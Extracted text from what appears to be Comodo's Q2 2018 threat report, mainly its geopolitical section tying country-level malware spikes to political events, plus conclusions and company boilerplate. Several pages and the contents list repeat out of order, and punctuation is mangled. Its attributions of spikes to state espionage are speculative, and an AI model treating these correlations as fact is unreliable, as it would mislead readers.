A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
